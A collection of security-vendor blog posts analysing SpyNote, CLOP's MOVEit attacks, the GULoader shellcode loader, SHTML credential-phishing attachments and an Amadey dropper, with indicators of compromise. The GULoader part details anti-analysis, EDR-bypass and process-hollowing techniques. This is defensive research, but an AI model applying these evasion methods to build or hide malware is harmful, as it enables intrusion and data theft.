f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422  com.faceai.boot  東京電力TEPCO 
755585571f47cd71df72af0fad880db5a4d443dacd5ace9cc6ed7a931cb9c21d  com.faceai.boot  東京電力TEPCO 
2352887e3fc1e9070850115243fad85c6f1b367d9e645ad8fc7ba28192d6fb85  com.faceai.boot  東京電力TEPCO 
90edb28b349db35d32c0190433d3b82949b45e0b1d7f7288c08e56ede81615ba  com.faceai.boot  東京電力TEPCO 
513dbe3ff2b4e8caf3a8040f3412620a3627c74a7a79cce7d9fab5e3d08b447b  com.faceai.boot  東京電力TEPCO 
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422  com.faceai.boot  東京電力TEPCO 
0fd87da37712e31d39781456c9c1fef48566eee3f616fbcb57a81deb5c66cbc1  com.faceai.boom  東京水道局アプリ 
acd36f7e896e3e3806114d397240bd7431fcef9d7f0b268a4e889161e51d802b  com.faceai.boom  東京水道局アプリ 
91e2f316871704ad7ef1ec74c84e3e4e41f557269453351771223496d5de594e  com.faceai.boom  東京水道局アプリ 

 

 

The post Android SpyNote attacks electric and water public utility users in Japan appeared first on McAfee Blog.

CLOP Ransomware exploits MOVEit software

21 June 2023 at 09:00

Authored by: Abhishek Karnik and Oliver Devane

You may have heard recently in the news that several organizations, including banks, federal agencies, and corporate entities, have suffered data breaches due to a series of ransomware attacks initiated by the Clop hacker group (aka CLOP, CL0p), that leveraged a vulnerability in MOVEit software.

Three critical vulnerabilities (CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708) have been reported in the software. However, the group is only known to have leveraged one, CVE-2023-34362 to obtain unauthorized access to sensitive data. The vulnerabilities, if exploited, result from a structured query language (SQL) injection attack, that allows attackers access to databases hosted by the MOVEit application. 

SQL injection is a technique by which attackers exploit vulnerabilities that allows the injection of malicious code into an application to view or modify a database (in this case MOVEit) 

Ransomware is a certain class of malware that tries to extort money as a ransom payment. The typical tactics for such malware are: 

  1. Encrypt files on a machine and demand payment for file decryption.
  2. Siphon important business, confidential or sensitive data, and then demand a payment to prevent public disclosure of such data. 

While there were no reports of file encryption in this wave, the malicious actors stole files from the impacted companies and are now extorting them by demanding payment to prevent the hackers from releasing the files to the public. It should be noted that this is not the first time Clop has used these tactics. 

How did this attack occur and how does this impact you? 

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) first warned of this attack via a press release on June 7, 2023. The attackers exploited a zero-day threat in MOVEIt software.  Internet-facing MOVEit transfer web applications were compromised through the vulnerabilities listed above and infected with malware that then subsequently stole data from underlying MOVEit databases. The result was that any file that was transferred using MOVEit could also have been stolen by malicious actors. Once the data was siphoned, the attackers contacted the organizations to inform them that they were victims of an attack and that the files would be published publicly if a ransom wasn’t paid on time.  

The impact of this is that potentially sensitive files that may have contained intellectual property or personally identifiable customer data could be made available on the Internet. This, of course, would have severe ramifications for not only the impacted organizations, but also for customers or users who had provided information to them.  

What can you do? 

If you operate a business that utilizes the MOVEit software, it is imperative that you follow guidance provided by Progress Software and CISA. 

It’s unlikely that individual consumers will be directly impacted by the CLOP malware. However, there is a possibility that you may have been indirectly impacted if an organization you have previously subscribed to or provided information to is a victim. This FAQ and blog by McAfee contains great details on what steps you should follow if your data is part of a data breach.  

Such breaches can also have a ripple effect where malicious actors who weren’t directly involved with the ransomware attack may take advantage of the event, to target potential victims with scams. Be cautious of emails or other correspondence claiming to be from a company that has been impacted by this Ransomware attack. Double-check the email address and verify any links that are present in the emails. Read more about how to recognize and protect yourself from phishing 

The post CLOP Ransomware exploits MOVEit software appeared first on McAfee Blog.

GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader

9 May 2023 at 17:50

Authored by: Anandeshwar Unnikrishnan

Stage 1: GULoader Shellcode Deployment 

In recent GULoader campaigns, we are seeing a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system. The NSIS scriptable installer is a highly efficient software packaging utility. The installer behavior is dictated by an NSIS script and users can extend the functionality of the packager by adding custom libraries (dll) known as NSIS plugins. Since its inception, adversaries have abused the utility to deliver malware. 

NSIS stands for Nullsoft Scriptable Installer. NSIS installer files are self-contained archives enabling malware authors to include malicious assets along with junk data. The junk data is used as Anti-AV / AV Evasion technique. The image below shows the structure of an NSIS GULoader staging executable archive.

 

The NSIS script, which is a file found in the archive, has a file extension .nsi as shown in the image above. The deployment strategy employed by the threat actor can be studied by analyzing the NSIS script commands provided in the script file. The image shown below is an oversimplified view of the whole shellcode staging process. 

The file that holds the encoded GULoader shellcode is dropped on to victim’s disc based on the script configuration along with other data. Junk is appended at the beginning of the encoded shellcode. The encoding style varies from sample to sample. But in all most all the cases, it’s a simple XOR encoding. As mentioned before, the shellcode is appended to junk data, because of this, an offset is used to retrieve encoded GULoader shellcode. In the image, the FileSeek NSIS command is used to do proper offsetting. Some samples have unprotected GULoader shellcode appended to junk data. 

 

A plugin used by the NSIS installer is nothing but a DLL which gets loaded by the installer program at runtime and invokes functions exported by the library Two DLL files are dropped in user’s TEMP directory, in all analyzed samples one DLL has a consistent name of system.dll and name of the other one varies.   

The system.dll is responsible for allocating memory for the shellcode and its execution. The following image shows how the NSIS script calls functions in plugin libraries.

 

The system.dll has the following exports as shown the in the image below. The function named “Call” is being used to deploy the shellcode on victim’s system. 

  • The Call function exported by system.dll resolves following functions dynamically and execute them to deploy the shellcode. 
  • CreateFile – To read the shellcode dumped on to disk by the installer. As part of installer set up, all the files seen in the installer archive earlier are dumped on to disk in new directory created in C:\ drive. 
  • VirtualAlloc – To hold the shellcode in the RWX memory. 
  • SetFilePointer – To seek the exact position of the shellcode in the dumped file. 
  • ReadFile – To read the shellcode.  
  • EnumResourceTypesA – Execution via callback mechanism. The second parameter is of the type ENUMRESTYPEPROCA which is simply a pointer to a callback routine. The address where the shellcode is allocated in the memory is passed as the second argument to this API leading to execution of the shellcode. Callback functions parameters are good resources for indirect execution of the code.   

Vectored Exception Handling in GULoader 

The implementation of the exception handling by the Operating System provides an opportunity for the adversary to take over execution flow. The Vectored Exception Handling on Windows provides the user with ability to register custom exception handler, which is simply a code logic that gets executed at the event of an exception. The interesting thing about handling exceptions is that the way in which the system resumes its normal execution flow of the program after the event of exception. Adversaries exploit this mechanism and take ownership of the execution flow. Malware can divert the flow to the code which is under its control when the exception occurs. Normally it is employed by the malware to achieve following goals: 

  • Hooking 
  • Covert code execution and anti-analysis 

The GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis. This section will cover the internals of Vectored exception handling on Windows and investigates how GUloader is abusing the VEH mechanism to thwart any analysis efforts.  

  • The Vectored Exception Handling (VEH) is an extension of Structured Exception Handling (SEH) with which we can add a vectored exception handler which will be called despite of our position in a call frame, simply put VEH is not frame-based. 
  • VEH is abused by malware, either to manipulate the control flow or covertly execute user functions. 
  • Windows provides AddVectoredExceptionHandler Win32 API to add custom exception handlers. The function signature is shown below. 

The Handler routine is of the type PVECTORED_EXCEPTION_HANDLER. Further checking the documentation, we can see the handler function takes a pointer to _EXCEPTION_POINTERS type as its input as shown in the image below. 

 

The _EXCEPTION_POINTERS type holds two important structures; PEXCEPTION_RECORD and PCONTEXT. PEXCEPTION_RECORD contains all the information related to exception raised by the system like exception code etc. and PCONTEXT structure holds CPU register (like RIP/EIP, debug registers etc.) values or state of the thread captured when exception occurred. 

 

  • This means the exception handler can access both ExceptionRecord and ContextRecord. Here from within the handler one can tamper with the data stored in the ContextRecord, thus manipulating EIP/RIP to control the execution flow when user application resumes from exception handling.    
  • There is one interesting thing about exception handling, the execution to the application is given back via NtContinue native routine. Exception dispatch routines call the handler and when handler returns to dispatcher, it passes the ContextRecord to the NtContinue and execution is resumed from the EIP/RIP in the record. On a side note, this is an oversimplified explanation of the whole exception handling process. 

Vectored Handler in GULoader 

  • GULoader registers a vectored exception handler via RtlAddVectoredExceptionHandler native routine.  The below image shows the control flow of the handler code. Interestingly most of the code blocks present here are junk added to thwart the analysis efforts.  

 

  • The GULoader’s handler implementation is as follows (disregarding the junk code). 
  • Reads ExceptionInfo passed to the handler by the system. 
  • Reads the ExceptionCode from ExceptionRecord structure. 
  • Checks the value of ExceptionCode field against the computed exception codes for STATUS_ACCESS_VIOLATION, STATUS_BREAKPOINT and STATUS_SINGLESTEP. 
  • Based on the exception code, malware takes a branch and executes code that modifies the EIP. 

 

 

The GULoader sets the trap flag to trigger single stepping intentionally to detect analysis. The handler code gets executed as discussed before, a block of code is executed based on the exception code. If the exception is single stepping, status code is 0x80000004, following actions take place:

  • The GULoader reads the ContextRecord and retrieves EIP value of the thread. 
  •  Increments the current EIP by 2 and reads the one byte from there. 
  • Performs an XOR on the one-byte data fetched from step before and a static value. The static value changes with samples. In our sample value is 0x1A. 
  • The XOR’ed value is then added to the EIP fetched from the ContextRecord. 
  • Finally, the modified EIP value from prior step is saved in the ContextRecord and returns the control back to the system(dispatcher). 
  • The malware has the same logic for the access violation exception. 

 

  • When the shellcode is executed without debugger, INT3 instruction invokes the vectored exception handler routine, with an exception of EXCEPTION_BREAKPOINT, handler computes EIP by incrementing the EIP by 1 and fetching the data from incremented location. Later XORing the fetched data with a constant in our case 0x1A. The result is added to current EIP value. The logic implemented for handling INT3 exceptions also scan the program code for 0xCC instructions put by the researchers. If 0xCC are found that are placed by researchers then EIP is not calculated properly. 

 

EIP Calculation Logic Summary 

Trigger via interrupt instruction (INT3)  eip=((ReadByte(eip+1)^0x1A)+eip) 
Trigger via Single Stepping(PUSHFD/POPFD)  eip=((ReadByte(eip+2)^0x1A)+eip) 

*The value 0x1A changes with samples 

Detecting Abnormal Execution Flow via VEH 

  • The shellcode is structured in such a way that the malware can detect abnormal execution flow by the order in which exception occurred at runtime. The pushfd/popfd instructions are followed by the code that when executed throws STATUS_ACCESS_VIOLATION. When program is executed normally, the execution will not reach the code that follows the pushfd/popfd instruction block, thus raising only STATUS_SINGLESTEP. When accidently stepped over the pushfd/popfd block in debugger, the STATUS_SINGLESTEP is not thrown at the debugger as it suppreses this because the debugger is already single stepping through the code, this is detected by the handler logic when we encounter code that follows the pushfd/popfd instruction block wich throws a STATUS_ACCESS_VIOLATION. Now it runs into a nested exception situation (the access violation followed by suppressed single stepping exception via trap). Because of this, whenever an access violation occurs, the handler routine checks for nested exception information in _EXCEPTION_POINTERS structure as discussed in the beginning. 

Below image shows this the carefully laid out code to detect analysis. 

 

The Egg hunting: VEH Assisted Runtime Padding 

One interesting feature seen in GULoader shellcode in the wild is runtime padding. Runtime padding is an evasive behavior to beat automated scanners and other security checks employed at runtime. It delays the malicious activities performed by the malware on the target system.  

  • The egg value in the analyzed sample is 0xAE74B61.  
  • It initiates a search for this value in its own data segment of the shellcode. 
  • Don’t forget the fact that this is implemented via VEH handler. This search itself adds 0.3 million of VEH iteration on top of regular VEH control manipulation employed in the code. 
  • The loader ends this search when it retrieves the address location of the egg value. To make sure the value is not being manipulated by any means by the researcher, it performs two additional checks to validate the egg location. 
  • If the check fails, the search continues. The process of retrieving the location of the egg is shown in the image below.  

  • As mentioned above, the validity of the egg location is checked by retrieving byte values from two offsets: one is 4 bytes away from the egg location and the value is 0xB8. The other is at 9 bytes from the egg location and the value is 0xC3. This check needs to be passed for the loader to proceed to the next stage of infection. Core malware activities are performed after this runtime padding loop. 

 The following images show the egg location validity checks performed by GULoader. The values 0xB8 and 0xC3 are checked by using proper offsets from the egg location. 

 

Stage 2: Environment Check and Code Injection  

In the second stage of the infection chain, the GULoader performs anti-analysis and code injection. Major anti-analysis vectors are listed below. After making sure that shellcode is not running in a sandbox, it proceeds to conduct code injection into a newly spawned process where stage 3 is initiated to download and deploy actual payload. This payload can be either commodity stealer or RAT.  

Anti-analysis Techniques  

  • Employs runtime padding as discussed before. 
  • Scans whole process memory for analysis tool specific strings 
  • Uses DJB2 hashing for string checks and dynamic API address resolution. 
  • Strings are decoded at runtime 
  • Checks if qemu is installed on the system by checking the installation path: 
  • C:\\Program Files\\qqa\\qqa.exe 
  • Patches the following APIs: 
  • DbgUIRemoteBreakIn 
  • The function’s prologue is patched with ExitProcess call 
  • LdrLoadDll 
  • The initial bytes are patched with instruction “mov edi edi” 
  • DbgBreakPoint 
  • Patches with instruction nop 
  • Clears hooks placed in ntdll.dll by security products or researcher for the analysis. 
  • Window Enumeration via EnumWindows 
  • Hides the shellcode thread from the debugger via ZwSetInformationThread by passing 0x11 (ThreadHideFromDebugger) 
  • Device driver enumeration via EnumDeviceDrivers andGetDeviceDriverBaseNameA 
  • Installed software enumeration via MsiEnumProductsA and MsiGetProductInfoA 
  • System service enumeration via OpenSCManagerA and EnumServiceStatusA 
  • Checks use of debugging ports by passing ProcessDebugPort (0x7) class to NtQueryInformationProcess 
  • Use of CPUID and RDTSC instructions to detect virtual environments and instrumentation. 

Anti-dump Protection 

Whenever GULoader invokes a Win32 api, the call is sandwiched between two XOR loops as shown in the image below.  The loop prior to the call encoded the active shellcode region where the call is taking place to prevent the memory from getting dumped by the security products based on event monitoring or api calls. Following the call, the shellcode region is decoded again back to normal and resumes execution. The XOR key used is a word present in the shellcode itself. 

 

String Decoding  

This section covers the process undertaken by the GUloader to decode the strings at the runtime. 

  • The NtAllocateVirtualMemory is called to allocate a buffer to hold the encoded bytes. 
  • The encoded bytes are computed by performing various arithmetic and logical operations on static values embedded as operands of assembly instructions. Below image shows the recovery of encoded bytes via various mathematical and logical operations. The EAX points to memory buffer, where computed encoded values get stored. 

 

The first byte/word is reserved to hold the size of the encoded bytes. Below shows a 12 byte long encoded data being written to memory. 

Later, the first word gets replaced by the first word of the actual encoded data. Below image shows the buffer after replacing the first word. 

The encoded data is fully recovered now, and malware proceeds to decode it. For decoding the simple XOR is employed, and key is present in the shellcode. The assembly routine that does the decoding is shown in the image below. Each byte in the buffer is XORed with the key. 

 

The result of the XOR operation is written to same memory buffer that holds the encoded data. A final view of the memory buffer with decoded data is shown below. 

The image shows the decoding the string “psapi.dll”, later this string is used in fetching the addresses of various functions to employ anti-analysis.  

 

The stage 2 culminates in code injection, to be specific GULoader employs a variation of the process hollowing technique, where a benign process is spawned in a suspended state by the malware stager process and proceeds to overwrite the original content present in the suspended process with malicious content, later the state of the thread in the suspended process is changed by modifying processor register values like EIP and finally the process resumes its execution. By controlling EIP, malware can now direct the control flow in the spawned process to a desired code location. After a successful hollowing, the malware code will be running under the cover of a legit application.  

The variation of hollowing technique employed by the GULoader doesn’t replace the file contents, but instead injects the same shellcode and maps the memory in the suspended process. Interestingly, GULoader employs an additional technique if the hollowing attempt fails. More details are covered in the following section.  

Listed below Win32 native APIs are dynamically resolved at runtime to perform the code injection. 

  • NtCreateSection 
  • ZwMapViewOfSection 
  • NtWriteVirtualMemory 
  • ZwGetContetThread 
  • NtSetContextThread 
  • NtResumeThread   

Overview of Code Injection 

  • Initially image “%windir%\Microsoft.NET\Framework\version on 32-bit systems\<version>\CasPol.exe” is spawned in suspended mode via CreateProcessInternalW native API. 
  • The Gu loader retrieves a handle to the file “C:\Windows\SysWOW64\iertutil.dll” which is used in section creation. The section object created via NtCreateSection will be backed by iertutil.dll.  
  • This behavior is mainly to avoid suspicion, a section object which is not backed by any file may draw unwanted attention from security systems.  
  • The next phase in the code injection is the mapping of the view created on the section backed by the iertutil.dll into the spawned CasPol.exe process. Once the view is successfully mapped to the process, malware can inject the shellcode in the mapped memory and resume the process thus initiating stage 3. The native api ZwMapViewOfSection is used to perform this task. Following the execution of the above API, the malware checks the result of the function call against the below listed error statuses. 
  • C0000018 (STATUS_CONFLICTING_ADDRESS) 
  • C0000220 (STATUS_MAPPED_ALIGNMENT) 
  • 40000003 (STATUS_IMAGE_NOT_AT_BASE). 
  • If the mapping is unsuccessful and status code returned by ZwMapViewOfSection matches with any of the code mentioned above, it has a backup plan. 
  • The GuLoader calls NtAllocateVirtualMemory by directly calling the system call stub which is normally found in ntdll.dll library to bypass EDR/AV hooks. The memory is allocated in the remote CasPol.exe process with an RWX memory protection. Following image shows the direct use of NtAllocateVirtualMemory system call. 

After memory allocation, it writes itself into remote process via NtWriteVirtualMemory as discussed above. GULoader shellcodes taken from the field are bigger in size,  samples taken for this analysis are all greater than 20 mb. In samples analyzed, the buffer size allocated to hold the shellcode is 2950000 bytes. The below image shows the GuLoader shellcode in the memory. 

 

Misleading Entry point  

  • The GULoader is highly evasive in nature, if abnormal execution flow is detected with help of employed anti-analysis vectors, the EIP and EBX fields of thread context structure (of CasPol.exe process) will be overwritten with a decoy address, which is required for the stage 3 of malware execution. The location ebp+4 is used to hold the entry point despite of the fact whether program is being debugged or not. 
  • The Gu loader uses ZwGetContextThread and NtSetContextThread routines to accomplish modification of the thread state. The CONTEXT structure is retrieved via ZwGetContextThread, the value [ebp+14C] is used as the entry point address. The current EIP value held in the EIP field in the context structure of the thread will be changed to a recalculated address based on value at ebp+4. Below image shows the RVA calculation.  The base address of the executing shellcode (stage 2) is subtracted from the virtual address [ebp+4] to obtain RVA.  

 

The RVA is added to the base address of the newly allocated memory in the CasPol.exe process to obtain new VA which can be used in the remote process. The new VA is written into EIP and EBX field in the thread context structure of the CasPol.exe process retrieved via ZwGetContextThread. Below image shows the modified context structure and value of EIP.  

 

Finally, by calling ZwSetContextThread, the changes made to the CONTEXT structure is committed in the target thread of CasPol.exe process. The thread is resumed by calling NtResumeThread. The CasPol.exe resumes execution and performs stage 3 of the infection chain. 

Stage 3: Payload Deployment  

The GULoader shellcode resumes execution from within a new host process, in this report, analyzed samples inject the shellcode either into the same process spawned as a child process or caspol.exe. Stage3 performs all the anti-analysis once again to make sure this stage is not being analyzed. After all checks, GUloader proceeds to perform stage3 activities by decoding the encoded C2 string in the memory as shown in the image below. The decoding method is the same as discussed before. 

Later the addresses of following functions are resolved dynamically by loading wininet.dll: 

  • InternetOpenA 
  • InternetSetOptionA 
  • InternetOpenUrlA 
  • InternetReadFile 
  • InternetCloseHandle. 

The below image shows the response from the content delivery network (cdn) server where the final payload is stored. In this analysis, a payload of size 0x2E640 bytes is sent to the loader. Interestingly, the first 40 bytes are ignored by the loader. The actual payload starts from the offset 40 which is highlighted in the image. 

 

The cdn server is well protected, it only serves to clients with proper headers and cookies. If these are not present in the HTTP request, the following message is shown to the user. 

Final Payload 

Quasi Key Generation 

The first step in decoding the the downloaded final payload by the GUloader is generating a quasi key which will be later used in decoding the actual key embeded in the GULoader shellcode. The encoded embeded key size is 371 bytes in analysed sample. The process of quasi key generation is as follows: 

  • The 40th and 41st bytes (word) are retrived from the download buffer in the memory. 
  • The above word is XORed with the first word of the encoded embeded key along and a counter value. 
  • The process is repeated untill the the word taken from the downloaded data fully decodes and have a value of 0x4D5A “MZ”. 
  • The value present in the counter when the 4D5A gets decoded is taken as the quasi key. This key is shown as “key-1” in the image below. In the analysed sample the value of this key is “0x5448” 

Decoding Actual Key 

The embedded key in the GULoader shellcode is of the size 371 bytes as discussed before. The quasi key is used to decode the embeded key as shown in the image below. 

  • Each word in the embeded key is XORed with quasi key key-1. 
  • When the interation counter exceeds the size value of 371 bytes, it stops and proceeds to decode the downloaded payload with this new key. 

The decoded 371 bytes of embeded key is shown below in the image below. 

Decoding File 

A byte level decoding happens after embeded key is decoded in the memory. Each byte of the downloaded data is XORed with the key to obtain the actual data, which is a PE file. The decoded data is overwritten to the same buffer used to download the decoded data. 

The final decoded PE file residing in the memory is shown in the image below: 

Finally, the loader loads the PE file by allocating the memory with RWX permission in the stage3 process, based on analyzing multiple samples its either the same process in stage 2 as the child process, or casPol.exe. The loading involved code relocation and IAT correction as expected in such a scenario. The final payload resumes execution from within the hollowed stage3 process. Below malware families are usually seen deployed by the GULoader: 

  • Vidar (Stealer) 
  • Raccoon (Stealer) 
  • Remcos RAT 

Below image shows the injected memory regions in stage3 process caspol.exe in this report. 

Conclusion  

The role played by malware loaders popularly known as “crypters” is significant in the deployment of Remote Administration Tools and stealer malwares that target consumer data. The exfiltrated Personal Identifiable Information (PII) extracted from the compromised endpoints are largely collected and funneled to various underground data selling marketplaces. This also impacts businesses as various critical information used for authentication purposes are getting leaked from the personal systems of the user leading to initial access on the company networks. The GuLoader is heavily used in mass malware campaigns to infect the users with popular stealer malware like Raccoon, Vidar, and Redline. Commodity RATs like Remcos are also seen delivered in such campaign activities. On the bright side, it is not difficult to fingerprint malware specimens used in the mass campaigns because of the volume its volume and relevance, detection rules and systems can be built around this very fact. 

 

Following table summarizes all the dynamically resolved Win32 APIs  

Win32 API 
RtlAddVectoredExceptionHandler 
NtAllocateVirtualMemory 
DbgUIRemoteBreakIn 
LdrLoadDll 
DbgBreakPoint 
EnumWindows 
Nt/ZwSetInformationThread 
EnumDeviceDrivers 
GetDeviceDriverBaseNameA 
MsiEnumProductsA 
MsiGetProductInfoA 
TerminateProcess 
ExitProcess 
NtSetContextThread 
NtWriteVirtualMemory 
NtCreateSection 
NtMapViewOfSection 
NtOpenFile 
NtSetInformationProcess 
NtClose 
NtResumeThread 
NtProtectVirtualMemory 
CreateProcessInternal 
GetLongPathNameW 
Sleep 
NtCreateThreadEx 
WaitForSingleObject 
TerminateThread 
CreateFileW 
WriteFile 
CloseHandle 
GetFileSize 
ReadFile 
ShellExecuteW 
SHCreateDirectoryExW 
RegCreateKeyExA 
RegSetValueExA 
OpenSCManagerA 
EnumServiceStatusA 
CloseServiceHandle 
NtQueryInformationProcess 
InternetOpenA 
InternetSetOptionA 
InternetOpenUrlA 
InternetReadFile 
InternetCloseHandle 

 

IOC 

889fddcb57ed66c63b0b16f2be2dbd7ec0252031cad3b15dfea5411ac245ef56 

59b71cb2c5a14186a5069d7935ebe28486f49b7961bddac0a818a021373a44a3 

4d9cdd7526f05343fda35aca3e0e6939abed8a037a0a871ce9ccd0e69a3741f2 

c8006013fc6a90d635f394c91637eae12706f58897a6489d40e663f46996c664 

c69e558e5526feeb00ab90efe764fb0b93b3a09692659d1a57c652da81f1d123 

45156ac4b40b7537f4e003d9f925746b848a939b2362753f6edbcc794ea8b36a 

e68ce815ac0211303d2c38ccbb5ccead144909d295230df4b7a419dfdea12782 

b24b36641fef3acbf3b643967d408b10bf8abfe1fe1f99d704a9a19f1dfc77e8 

569aa6697083993d9c387426b827414a7ed225a3dd2e1e3eba1b49667573fdcb 

60de2308ebfeadadc3e401300172013be27af5b7d816c49696bb3dedc208c54e 

23458977440cccb8ac7d0d05c238d087d90f5bf1c42157fb3a161d41b741c39d 

The post GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader appeared first on McAfee Blog.

New Wave of SHTML Phishing Attacks

8 May 2023 at 11:10

Authored By Anuradha

McAfee Labs has recently observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest user-sensitive information. 

SHTML Campaign in the field: 

Figure 1. shows the geological distribution of McAfee clients who detect malicious SHTML files. 

Figure 1. McAfee Client Detection of SHTML 

 

Attackers victimize users by distributing SHTML files as email attachments. The sentiments used in such phishing emails include a payment confirmation, invoice, shipment etc., The email contains a small thread of messages to make the recipient more curious to open the attachment.  

Figure 2. Email with SHTML attachment 

 

Analysis: 

When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser as shown in Figure 3. To read the document, however, the user must enter his/her credentials. In some cases, the email address is prefilled. 

Figure 3. Fake PDF document 

 

Figure 4. Fake Excel document 

 

Figure 5. Fake DHL Shipping document

 

Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior. 

 

Figure 6. SHTML with JavaScript code 

 

Below is the code snippet that shows how the blurred background image is loaded. The blurred images are taken from legitimate websites such as: 

https://isc.sans.edu  

https://i.gyazo.com 

Figure 7. Code to load blurred image  

 

Abusing submission form service: 

Phishing attacks abuse static form service providers to steal sensitive user information, such as Formspree and Formspark

Formspree.io is a back-end service that allows developers to easily add forms on their website without writing server-side code, it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address. 

The attackers use the formpsree.io URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method.  

 

Figure 8. Formspree.io as action URL with POST method 

 

When the user enters the credentials and hits the “submit” button, the data is sent to Formspree.io. Subsequently, Formspree.io forwards the information to the specified email address. Below Figure 9. shows the flow of user submission data from webpage to attacker email address. 

Figure 9. Flow of user submission data 

 

Known malicious forms may be blocked, preventing the form submission data from being sent to the attacker. Below Figure 10. shows the Form blocked due to suspected fraudulent activity. 

Figure 10. Form Blocked 

 

To prevent the user from recognizing that they’ve just been phished, the attacker redirects the user’s browser to an unrelated error page that is associated to a legitimate website. 

Below Figure 11.  shows the redirected webpage.

Figure 11. Redirected webpage 

 

To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry image phishing scam uses simple basic HTML and JavaScript code, but it can still be effective. A blurry image is enough to trick many users into believing the email as legitimate. To stay protected, users should keep their system up-to-date and refrain from clicking links and opening SHTML attachments that comes through email from untrusted sources. 

 

IOCs 

McAfee customers are protected against this phishing campaign. 

 
Type   Value   Product   Detected  
URL   formspree[.]io/f/xjvderkn  McAfee WebAdvisor   Blocked  
URL   cianindustries[].com/error/excel.php  McAfee WebAdvisor   Blocked  

 

URL   twenty88[.]com/mincs/mea.ph  McAfee WebAdvisor   Blocked  
URL   sweet.classicbo[.]com/mailb_fixpd.ph  McAfee WebAdvisor   Blocked  

 

 

 

Type  Value  Product  Detected 
shtml(Adobe)  0a072e7443732c7bdb9d1f3fdb9ee27c  Total Protection and LiveSafe  HTML/Phishing.qz 
shtml(Excel)  3b215a37c728f65c167941e788935677  Total Protection and LiveSafe  HTML/Phishing.rb 
shtml(DHL)  257c1f7a04c93a44514977ec5027446c  Total Protection and LiveSafe  HTML/Phishing.qz 

 

 

The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.

Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution

5 May 2023 at 21:30

Authored by By Yashvi Shah 

McAfee Labs have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.  

Wextract.exe is a Windows executable file that is used to extract files from a cabinet (.cab) file. Cabinet files are compressed archives that are used to package and distribute software, drivers, and other files. It is a legitimate file that is part of the Windows operating system, and it is located in the System32 folder of the Windows directory. However, like other executable files, it can be vulnerable to exploitation by malicious actors who might use it as a disguise for malware. 

Some common ways that malicious actors use a fake or modified version of wextract.exe include: 

  1. Malware Distribution: Malicious actors can use a fake version of the wextract.exe to deliver malware onto a victim’s computer. They can disguise the malware as a legitimate file and use the fake wextract.exe to extract and execute the malicious code. 
  2. Information stealing: A fake or modified wextract.exe can be used to steal sensitive information from a victim’s computer. Malicious actors can modify the code to include keyloggers or other data-stealing techniques. 
  3. Remote Access: Malicious actors can use a fake wextract.exe to gain remote access to a victim’s computer. They can use the modified wextract.exe to create a backdoor or establish a remote connection to the victim’s computer, allowing them to carry out various malicious activities. 
  4. Ransomware Delivery: Malicious actors can use a fake or modified “wextract.exe” to install ransomware on a victim’s system. For example, they may create a fake Windows Installer package that appears to be a legitimate software update or utility but also includes a modified “wextract.exe” that encrypts the victim’s files and demands a ransom payment for their decryption.  

McAfee Labs collected malicious wextract.exe samples from the wild, and its behavior was analyzed.  

This blog provides a detailed technical analysis of malicious “wextract.exe” that is used as a delivery mechanism for multiple types of malwares, including Amadey and Redline Stealer. It also provides detailed information on the techniques used by the malware to evade detection by security software and execute its payload. Once the malware payloads are executed on the system, they establish communication with a Command and Control (C2) server controlled by the attacker. This communication allows the attacker to exfiltrate data from the victim’s system, including sensitive information such as login credentials, financial data, and other personal information.

Figure 1: Characteristic of the file 

 

The file is a 32-bit Portable Executable file, which is 631.50 Kb in size. The original name of the file is WEXTRACT.EXE.MUI. The file description is “Самоизвлечение CAB-файлов Win32”, written in Russian, and means “Self-Extracting Win32 CAB Files”. The legal copyright mentions Microsoft Corporation. A lot of static strings of this file were found to be written in Russian. 

Normally, the resource section (.rsrc) contains resources used by the program, such as icons, bitmaps, strings, and dialog boxes. Attackers leverage the resource section of a PE file to improve the success of their attacks by evading detection, enhancing persistence, and adding functionality. 

The resource section of this sample has multiples files, out of which CABINET resource holds 75.75% of the total file, which makes the said resource suspicious. 

Figure 2: Resources in the file 

 

A CAB (Cabinet) file is a compressed archive file format that is often used to compress and package multiple files into a single file for distribution or installation. A CAB file in the resource section of a PE file can be used for various purposes such as storing additional program files or data, including language-specific resources, or compressing and storing commonly used resources to reduce the size of the executable.  

The CABINET holds two executables, cydn.exe and vona.exe. 

Figure 3: CABINET in resource section 

 

Likewise, under RCDATA, there is another attribute called “RUNPROGRAM”, which starts cydn.exe.  RUNPROGRAM in the resource section of a malware file typically refers to a resource that contains instructions for the malware to execute a specific program or command. When the malware is executed, it will load the resource containing the “RUNPROGRAM” command and attempt to execute the specified program or command. This technique is often used by malware authors to execute additional malicious programs or commands on the infected system. For example, the “RUNPROGRAM” resource may contains instructions to download and execute additional malware, or to launch a malicious script or command that can perform various malicious activities such as stealing sensitive data, creating backdoors, or disabling security software. 

Figure 4: RUNPROGRAM attribute stating “cydn.exe” 

 

Like RUNPROGRAM, POSTRUNPROGRAM also holds the instruction to run the executable after RUNPROGRAM is executed. Hence, once cydn.exe is executed, vona.exe will be executed. 

Figure 5: POSTRUNPROGRAM stating “vona.exe” 

Once WEXTRACT.exe is executed, both cydn.exe and vona.exe is dropped in the TEMP folder. The TEMP folder is a commonly used location for malware to store temporary files and other data, as it is typically writable by any user account and is not usually subject to strict security restrictions. This can make it easier for the malware to operate without raising suspicion or triggering security alerts. 

Figure 6: Files dropped in TEMP folder 

Stage 2: Analysis of cydn.exe 

